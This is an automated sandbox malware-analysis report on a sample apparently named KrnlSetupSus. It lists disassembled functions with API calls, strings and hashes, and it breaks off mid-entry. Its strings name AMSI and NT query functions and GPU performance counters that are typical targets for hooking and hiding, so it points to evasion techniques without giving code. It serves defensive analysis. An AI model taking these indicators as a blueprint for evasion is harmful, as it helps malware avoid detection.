                                                                                                                                  Function 00007FFB4ADF1040 Relevance: .2, Instructions: 249COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 519bdcbf609bc7ec004aea068cc5bde008b16564e613e135f309c4d7e7264ee4
                                                                                                                                  • Instruction ID: e7b6f03177ea942dbfdd4a2e41196afb0ca2b6c5dc9ad336281578e80708054b
                                                                                                                                  • Opcode Fuzzy Hash: 519bdcbf609bc7ec004aea068cc5bde008b16564e613e135f309c4d7e7264ee4
                                                                                                                                  • Instruction Fuzzy Hash: F3612567A0E66586D7127BBCF4011EA7F28EF45375B0441B7EA8ECA097CD08249A83F1
                                                                                                                                  Function 1C5734B0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: eed59b40fb44a015fd89753d44b84933eca5a0542eb286ab4f7625b66429afb0
                                                                                                                                  • Instruction ID: b63ecda1bfbf26d32813d18f88c87f0ad88212914fa7a9db1e64b11f1aa0fa27
                                                                                                                                  • Opcode Fuzzy Hash: eed59b40fb44a015fd89753d44b84933eca5a0542eb286ab4f7625b66429afb0
                                                                                                                                  • Instruction Fuzzy Hash: 6501D6B16556818AF75A8F2AD81276A3791F3043D4F80812CD449C7A52DB3DD0E08F04
                                                                                                                                  Function 1C561E38 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 1C561E43
                                                                                                                                    • Part of subcall function 1C5621BC: GetModuleHandleA.KERNEL32(?,?,?,1C561E75), ref: 1C5621D4
                                                                                                                                    • Part of subcall function 1C5621BC: GetProcAddress.KERNEL32(?,?,?,1C561E75), ref: 1C5621E5
                                                                                                                                    • Part of subcall function 1C566030: GetCurrentThreadId.KERNEL32 ref: 1C56606B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                                                                                  • API String ID: 4175298099-4225371247
                                                                                                                                  • Opcode ID: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction ID: d9a87f4586596df3d62a08b319bed76a6ac1b229481c186192ff9c625aee8052
                                                                                                                                  • Opcode Fuzzy Hash: 6191e1ab36bf222c83b8ad8c498c744b26cf75ee4eb45f907204208c319144d1
                                                                                                                                  • Instruction Fuzzy Hash: 36416EB4294E6AE0FB04DBAAED50FD53326A7A1785FC04417C50952574EE78F2CEC3A4
                                                                                                                                  Function 1C5612B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 2005889112-2564639436
                                                                                                                                  • Opcode ID: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction ID: eec5c0d97bab18bcad0c06ab83897716d02d906bfd42ee39b507c7975de044fc
                                                                                                                                  • Opcode Fuzzy Hash: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
                                                                                                                                  • Instruction Fuzzy Hash: 67514132614BD486E714CF62E45879A77A2F788F99F944124DE8A47B18EF3CD099C740
                                                                                                                                  Function 1C56ED48 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000100,00000000,1C56F10A,?,?,00000000,1C56F08D), ref: 1C56EDB5
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,1C56F08D), ref: 1C56EDC7
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,1C56F08D), ref: 1C56EE09
                                                                                                                                  • VirtualProtect.KERNEL32 ref: 1C56EE65
                                                                                                                                  • VirtualProtect.KERNEL32 ref: 1C56EE96
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,1C56F08D), ref: 1C56EEDA
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,1C56F08D), ref: 1C56EEE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                                                                  • API String ID: 740688525-1880043860
                                                                                                                                  • Opcode ID: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction ID: ff031242910935018dd5ef38613a9afc6f28ea52ca0731e768deae39750b1585
                                                                                                                                  • Opcode Fuzzy Hash: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction Fuzzy Hash: 0241DF31702B6492EB159B67A8007997361BB88BB0F980725DE3E47BC0EF78E485C760
                                                                                                                                  Function 1C563178 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C5631CD
                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C5631E2
                                                                                                                                  • HeapAlloc.KERNEL32 ref: 1C5631F0
                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C563206
                                                                                                                                  • StrCmpW.SHLWAPI ref: 1C56321B
                                                                                                                                    • Part of subcall function 1C563720: StrCmpNW.SHLWAPI ref: 1C563742
                                                                                                                                    • Part of subcall function 1C563720: StrStrW.SHLWAPI ref: 1C563760
                                                                                                                                    • Part of subcall function 1C563720: StrToIntW.SHLWAPI ref: 1C563787
                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C563258
                                                                                                                                  • HeapFree.KERNEL32 ref: 1C563266
                                                                                                                                  Strings
                                                                                                                                  • \GPU Engine(*)\Running Time, xrefs: 1C563214
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                                                                                  • API String ID: 1943346504-1805530042
                                                                                                                                  • Opcode ID: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction ID: c0be9722f4cf7cb99709bab27778db6345b5de039ea356ad617c40163115e2b1
                                                                                                                                  • Opcode Fuzzy Hash: 1e0206962784cbb59066502de87d8a89b87f36d7e7391f794394394ba1b10176
                                                                                                                                  • Instruction Fuzzy Hash: 49219132A04FA197F710DF52E80478AB3A1FB88F99FD44225DE4947E25DF38E1968750
                                                                                                                                  Function 1C563288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C5632E6
                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C5632F7
                                                                                                                                  • HeapAlloc.KERNEL32 ref: 1C563305
                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C56331B
                                                                                                                                  • StrCmpW.SHLWAPI ref: 1C563330
                                                                                                                                    • Part of subcall function 1C563720: StrCmpNW.SHLWAPI ref: 1C563742
                                                                                                                                    • Part of subcall function 1C563720: StrStrW.SHLWAPI ref: 1C563760
                                                                                                                                    • Part of subcall function 1C563720: StrToIntW.SHLWAPI ref: 1C563787
                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C56335D
                                                                                                                                  • HeapFree.KERNEL32 ref: 1C56336B
                                                                                                                                  Strings
                                                                                                                                  • \GPU Engine(*)\Utilization Percentage, xrefs: 1C563329
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                                                                                  • API String ID: 1943346504-3507739905
                                                                                                                                  • Opcode ID: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction ID: 794c3d9f9570d19cd2769c6a7808571e7b3a76e7e091dad488167c0b5a9c4803
                                                                                                                                  • Opcode Fuzzy Hash: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction Fuzzy Hash: 59217C36B10F9186E700CF63E844B8A73A1FB84F99F944125DE8A43B25EF38E096C710
                                                                                                                                  Function 1C569FEC Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 1C56A049
                                                                                                                                    • Part of subcall function 1C56AF04: __GetUnwindTryBlock.LIBCMT ref: 1C56AF47
                                                                                                                                    • Part of subcall function 1C56AF04: __SetUnwindTryBlock.LIBVCRUNTIME ref: 1C56AF6C
                                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 1C56A121
                                                                                                                                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 1C56A36F
                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 1C56A47C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction ID: e28da39bd4d1cb94a42798f78b30050831bd326c70f6dc5687ef81e8819959dc
                                                                                                                                  • Opcode Fuzzy Hash: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction Fuzzy Hash: 1CC18A36A04BA0CAEB20CF66E88139D77B0F789798F104216DE8957F18DF38E195C761
                                                                                                                                  Function 1C56104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction ID: 26d36088331b7f587807605879973cf3f06eda83d0d1a7db455feb34565de622
                                                                                                                                  • Opcode Fuzzy Hash: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction Fuzzy Hash: 5E413B73614BC4CAE750CF62E44479EB7A1F388B99F948129DB8A07B18DF38D589CB50
                                                                                                                                  Function 1C567A10 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 1C567A38
                                                                                                                                  • __scrt_acquire_startup_lock.LIBCMT ref: 1C567A8A
                                                                                                                                  • _RTC_Initialize.LIBCMT ref: 1C567AB8
                                                                                                                                  • __scrt_dllmain_after_initialize_c.LIBCMT ref: 1C567ADE
                                                                                                                                  • __scrt_release_startup_lock.LIBCMT ref: 1C567B09
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction ID: 4c921fa172d0e2e83585ffe034821eb8d20b54c65b2760b4acceba4f1b73615c
                                                                                                                                  • Opcode Fuzzy Hash: 000656d6fc5cc55633a5880fd40a0c0c08ef8f78df8bf0495dc394bdb70342b6
                                                                                                                                  • Instruction Fuzzy Hash: E4711874701B61C6FB008F76D8407D967A2EBC5BC4F944525DA4887F25FB38E589C724
                                                                                                                                  Function 1C56986C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C5698F1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C5698FF
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C569929
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C569997
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,1C569A2B,?,?,?,1C56921C,?,?,?,?,1C568D25), ref: 1C5699A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                  • String ID: api-ms-
                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                  • Opcode ID: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction ID: 64c8797d990daa764d6e13e973e34c065402d9707bc350c0da5906405ce65279
                                                                                                                                  • Opcode Fuzzy Hash: 7bf7cdc7b69f067f631d6a6ea408090c199ac90ae3eed1cfa1a3fa05acbe6a2a
                                                                                                                                  • Instruction Fuzzy Hash: 2531A131312BE1D1FF059B17A800BD933A4BB44BA4F9A0625ED5E4BB54EF38D084C320
                                                                                                                                  Function 1C5731C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                  • String ID: CONOUT$
                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                  • Opcode ID: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction ID: 26822ce80277d93a5abe8df1222b3fe2857f8b1f656c6e85febd904b4ac00b82
                                                                                                                                  • Opcode Fuzzy Hash: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction Fuzzy Hash: F5116A31354F8086F3508B56E858B59B3A1F788FE8F844224EA5E87BA4DF3CD4848740
                                                                                                                                  Function 1C56C700 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 1C56C70F
                                                                                                                                  • SetLastError.KERNEL32 ref: 1C56C72E
                                                                                                                                  • FlsSetValue.KERNEL32 ref: 1C56C757
                                                                                                                                  • FlsSetValue.KERNEL32 ref: 1C56C768
                                                                                                                                  • FlsSetValue.KERNEL32 ref: 1C56C779
                                                                                                                                    • Part of subcall function 1C56D060: HeapFree.KERNEL32(?,?,?,?,?,?,?,1C56650A), ref: 1C56D076
                                                                                                                                    • Part of subcall function 1C56D060: GetLastError.KERNEL32(?,?,?,?,?,?,?,1C56650A), ref: 1C56D080
                                                                                                                                  • SetLastError.KERNEL32 ref: 1C56C79C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 365477584-0
                                                                                                                                  • Opcode ID: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction ID: 21238bd62b5b84788ad6ed55a59c55bf13f5e7f84ddb30096f28b226b1113a21
                                                                                                                                  • Opcode Fuzzy Hash: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction Fuzzy Hash: D011E138B117A0C2F7449B33B8507AEA242ABC4BA0F944A28CD5657BC4DF38F4828320
                                                                                                                                  Function 1C561A30 Relevance: 9.0, APIs: 6, Instructions: 41stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
